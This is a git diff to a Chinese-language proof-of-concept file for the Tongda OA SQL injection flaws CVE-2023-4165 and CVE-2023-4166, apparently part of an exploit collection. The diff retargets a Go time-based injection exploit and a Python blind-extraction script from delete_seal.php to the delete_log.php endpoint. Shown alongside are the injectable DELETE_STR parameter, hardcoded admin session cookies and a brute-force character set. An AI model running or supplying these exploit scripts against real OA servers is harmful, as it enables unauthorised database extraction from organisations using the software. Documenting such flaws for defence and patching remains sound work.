diff --git a/通达OA sql注入漏洞 CVE-2023-4166.md b/通达OA sql注入漏洞 CVE-2023-4166.md index 0d72818..26076d2 100644 --- a/通达OA sql注入漏洞 CVE-2023-4166.md +++ b/通达OA sql注入漏洞 CVE-2023-4166.md @@ -36,7 +36,7 @@ import ( // 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 func main() { // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php - url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL + url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php" // 目标网站的URL delay := 2 // 延迟时间,单位为秒 cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 @@ -106,7 +106,7 @@ headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" -url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" +url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=" result = ""